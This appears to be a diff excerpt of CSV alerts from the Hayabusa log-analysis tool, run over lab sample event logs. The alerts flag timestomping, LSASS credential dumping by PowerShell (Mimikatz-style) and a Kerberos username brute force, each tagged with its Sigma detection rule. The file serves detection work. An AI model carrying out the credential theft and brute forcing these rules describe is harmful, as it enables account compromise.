+2021-11-25 00:48:24.985 +09:00,jump01.offsec.lan,4616,medium,Evas,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.006-Timestomp/ID4616-system time changed.evtx
+2021-11-25 00:48:25.000 +09:00,jump01.offsec.lan,4616,medium,Evas,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.006-Timestomp/ID4616-system time changed.evtx
+2021-11-28 00:47:00.365 +09:00,jump01.offsec.lan,4616,medium,Evas,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.006-Timestomp/ID4616-system time changed.evtx
+2021-11-28 00:47:00.369 +09:00,jump01.offsec.lan,4616,medium,Evas,Unauthorized System Time Modification,,rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1070.006-Timestomp/ID4616-system time changed.evtx
+2021-12-01 07:05:47.229 +09:00,fs03vuln.offsec.lan,7,low,,Image Loaded_Sysmon Alert,"technique_id=T1086,technique_name=PowerShell | Image: C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\287ded39f444f2847a5175b4bf51f9c9\System.Management.Automation.ni.dll | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Company: Microsoft Corporation | Signed: false | Signature: Unavailable | PID: 2668 | PGUID: A57649D1-A03B-61A6-2F23-8D0000000000 | Hash: SHA1=4F4193BFF5970968B6EEAD58EB83F9415F32A5C1,MD5=9139657B434F2FA8023775958164DB0C,SHA256=EE9CD13CC38A285D48B00E21CBB11F9CA8C8F435ADF6ADF5281C371DD0A406AA,IMPHASH=00000000000000000000000000000000",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID3-7-10-Suspicious DLL loaded (CME+Mimikatz).evtx
+2021-12-01 07:05:50.065 +09:00,fs03vuln.offsec.lan,7,low,,Image Loaded_Sysmon Alert,"technique_id=T1047,technique_name=Windows Management Instrumentation | Image: C:\Windows\System32\wbem\wmiutils.dll | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Company: Microsoft Corporation | Signed: true | Signature: Valid | PID: 2668 | PGUID: A57649D1-A03B-61A6-2F23-8D0000000000 | Hash: SHA1=1663A59FF35A01F612C878AB83F2AD242BB46FB6,MD5=FC2036AB90490D8FDFB3B3F3B90AF56F,SHA256=E293B79E4C06E8DEFD95F3CB9B70BA1CC50E83C37930DA802B50066AC6DF0509,IMPHASH=77B4BD4D7F94DBB1235EEE9E8C0737DC",rules/hayabusa/sysmon/alerts/7_ImageLoaded_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID3-7-10-Suspicious DLL loaded (CME+Mimikatz).evtx
+2021-12-01 07:05:50.065 +09:00,fs03vuln.offsec.lan,7,info,Exec,WMI Modules Loaded,,rules/sigma/image_load/sysmon_wmi_module_load.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID3-7-10-Suspicious DLL loaded (CME+Mimikatz).evtx
+2021-12-01 07:05:50.864 +09:00,fs03vuln.offsec.lan,3,medium,,Network Connection_Sysmon Alert,"technique_id=T1086,technique_name=PowerShell | tcp | Src: 10.23.42.38:62095 (-) | Dst: 10.23.123.11:443 (-) | User: OFFSEC\admmig | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 2668 | PGUID: A57649D1-A03B-61A6-2F23-8D0000000000",rules/hayabusa/sysmon/alerts/3_NetworkConnection_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID3-7-10-Suspicious DLL loaded (CME+Mimikatz).evtx
+2021-12-01 07:05:50.864 +09:00,fs03vuln.offsec.lan,3,low,Exec,PowerShell Network Connections,,rules/sigma/network_connection/sysmon_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID3-7-10-Suspicious DLL loaded (CME+Mimikatz).evtx
+2021-12-01 07:05:59.943 +09:00,fs03vuln.offsec.lan,10,low,,Process Access,Src Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x143a | Src PID: 2668 | Src PGUID: A57649D1-A03B-61A6-2F23-8D0000000000 | Tgt PID: 480 | Tgt PGUID: A57649D1-92D8-61A4-7191-000000000000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID3-7-10-Suspicious DLL loaded (CME+Mimikatz).evtx
+2021-12-01 07:05:59.943 +09:00,fs03vuln.offsec.lan,10,high,CredAccess,Credentials Dumping Tools Accessing LSASS Memory,,rules/sigma/process_access/sysmon_cred_dump_lsass_access.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID3-7-10-Suspicious DLL loaded (CME+Mimikatz).evtx
+2021-12-01 07:05:59.943 +09:00,fs03vuln.offsec.lan,10,high,CredAccess,Suspicious GrantedAccess Flags on LSASS Access,,rules/sigma/process_access/win_susp_proc_access_lsass.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID3-7-10-Suspicious DLL loaded (CME+Mimikatz).evtx
+2021-12-01 07:05:59.943 +09:00,fs03vuln.offsec.lan,10,high,CredAccess,LSASS Memory Dump,,rules/sigma/process_access/sysmon_lsass_memdump.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID3-7-10-Suspicious DLL loaded (CME+Mimikatz).evtx
+2021-12-01 07:05:59.943 +09:00,fs03vuln.offsec.lan,10,high,CredAccess,Accessing WinAPI in PowerShell for Credentials Dumping,,rules/sigma/sysmon/sysmon_accessing_winapi_in_powershell_credentials_dumping.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID3-7-10-Suspicious DLL loaded (CME+Mimikatz).evtx
+2021-12-01 07:06:02.033 +09:00,fs03vuln.offsec.lan,3,medium,,Network Connection_Sysmon Alert,"technique_id=T1086,technique_name=PowerShell | tcp | Src: 10.23.42.38:62096 (-) | Dst: 10.23.123.11:443 (-) | User: OFFSEC\admmig | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 2668 | PGUID: A57649D1-A03B-61A6-2F23-8D0000000000",rules/hayabusa/sysmon/alerts/3_NetworkConnection_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID3-7-10-Suspicious DLL loaded (CME+Mimikatz).evtx
+2021-12-01 07:06:02.033 +09:00,fs03vuln.offsec.lan,3,low,Exec,PowerShell Network Connections,,rules/sigma/network_connection/sysmon_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID3-7-10-Suspicious DLL loaded (CME+Mimikatz).evtx
+2021-12-02 23:48:15.983 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: test1 | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx
+2021-12-02 23:48:15.983 +09:00,-,-,medium,InitAccess : PrivEsc,Invalid Users Failing To Authenticate From Source Using Kerberos,"[condition] count(TargetUserName) by IpAddress > 10 in timeframe [result] count:46 TargetUserName:test1/rey/b aer/sgfg/g/tbyt/ysy/admtest/wyt/vase/ytuntsr/mgdi/syvsdy/s/vt/test2/ugu/sef/gsdf/yvas/accrt/tc/dyfgdhbn/bsfin/ar/xvtrz/vs/uydzry/vay/yvsyv/tary/go/xt/nini/bdcy/xc/sfs/srey/m,og/vdr/tfay/nd/vga/vrat/rec/ryver IpAddress:::ffff:10.23.123.11 timeframe:24h",rules/sigma/builtin/security/win_susp_failed_logons_single_source_kerberos3.yml,-
+2021-12-02 23:48:16.298 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: admmig | Svc: krbtgt | IP Addr: ::ffff:10.23.123.11 | Status: 0x0 | PreAuthType: 2,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx
+2021-12-02 23:48:16.308 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: test2 | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx
+2021-12-02 23:48:16.311 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: admtest | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx
+2021-12-02 23:48:16.338 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: administrator | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x12 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx
+2021-12-02 23:48:16.338 +09:00,-,-,medium,InitAccess : PrivEsc,Disabled Users Failing To Authenticate From Source Using Kerberos,[condition] count(TargetUserName) by IpAddress > 10 in timeframe [result] count:16 TargetUserName:SM_2f6964c8f421408ab/SM_374806bcc65140a5a/Administrator/DefaultAccount/krbtgt/Test-ADM/SM_8b9faa99d83446d1b/SM_6aaeeb113c0c4af3a/administrator/SM_25e3b4425ffd47aab/SM_957258b5879242afb/SM_27d255b6407743b08/SM_2b6f1a51ac6c41b2a/Guest/SM_b2a35e76f50a4c23a/$P51000-50I28MP5JB3E IpAddress:::ffff:10.23.123.11 timeframe:24h,rules/sigma/builtin/security/win_susp_failed_logons_single_source_kerberos2.yml,-
+2021-12-02 23:48:16.342 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: admin-test | Svc: krbtgt | IP Addr: ::ffff:10.23.123.11 | Status: 0x0 | PreAuthType: 0,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx
+2021-12-02 23:48:16.956 +09:00,-,-,medium,InitAccess : PrivEsc,Valid Users Failing to Authenticate From Single Source Using Kerberos,[condition] count(TargetUserName) by IpAddress > 10 in timeframe [result] count:22 TargetUserName:svc-ata/svc_adfs01/HealthMailbox0ab31b3/HealthMailbox2cfa5bd/HealthMailboxf49e2c8/HealthMailbox9a2d0da/HealthMailboxf7e4358/adminupn42/vuln_scan/HealthMailboxe8b0d98/HealthMailboxdabf0a3/HealthMailboxc9291f7/proabcdef/HealthMailboxa935ecd/HealthMailboxeb3dc3f/HealthMailboxebdc745/domadm/admin-te/HealthMailboxa99e1bd/admin-hacker/svc_nxlog/Svc-SQL-DB01 IpAddress:::ffff:10.23.123.11 timeframe:24h,rules/sigma/builtin/security/win_susp_failed_logons_single_source_kerberos.yml,-
+2021-12-02 23:48:17.267 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: sgfg | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx
+2021-12-02 23:48:17.271 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: g | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx
+2021-12-02 23:48:17.274 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: dyfgdhbn | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx
+2021-12-02 23:48:17.277 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: xvtrz | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx
+2021-12-02 23:48:17.281 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: ar | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx
+2021-12-02 23:48:17.284 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: tary | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx
+2021-12-02 23:48:17.287 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: bsfin | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx
+2021-12-02 23:48:17.319 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: mgdi | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx
+2021-12-02 23:48:17.323 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: vdr | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx
+2021-12-02 23:48:17.327 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: tc | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx
+2021-12-02 23:48:17.331 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: syvsdy | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx
+2021-12-02 23:48:17.334 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: s | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx
+2021-12-02 23:48:17.337 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: ysy | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx
+2021-12-02 23:48:17.341 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: vrat | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx
+2021-12-02 23:48:17.344 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: vay | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx
+2021-12-02 23:48:17.348 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: vs | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx
+2021-12-02 23:48:17.351 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: uydzry | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx
+2021-12-02 23:48:17.354 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: rey | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx
+2021-12-02 23:48:17.357 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: vase | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx
+2021-12-02 23:48:17.360 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: ryver | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx
+2021-12-02 23:48:17.363 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: yvsyv | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx
+2021-12-02 23:48:17.367 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: srey | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx
+2021-12-02 23:48:17.370 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: b aer | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx
+2021-12-02 23:48:17.373 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: yvas | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx
+2021-12-02 23:48:17.376 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: tbyt | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx
+2021-12-02 23:48:17.379 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: nini | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx
+2021-12-02 23:48:17.382 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: ugu | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx
+2021-12-02 23:48:17.385 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,"User: m,og | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -",rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx
+2021-12-02 23:48:17.389 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: go | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx
+2021-12-02 23:48:17.392 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: nd | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx
+2021-12-02 23:48:17.395 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: bdcy | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx
+2021-12-02 23:48:17.398 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: rec | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx
+2021-12-02 23:48:17.401 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: xt | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx
+2021-12-02 23:48:17.405 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: accrt | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx
+2021-12-02 23:48:17.408 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: wyt | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx
+2021-12-02 23:48:17.410 +09:00,rootdc1.offsec.lan,4768,info,,Kerberos TGT Requested,User: xc | Svc: krbtgt/OFFSEC.LAN | IP Addr: ::ffff:10.23.123.11 | Status: 0x6 | PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1110.xxx-Brut force/ID4768-4771-Kerberos brutforce with non existing users.evtx
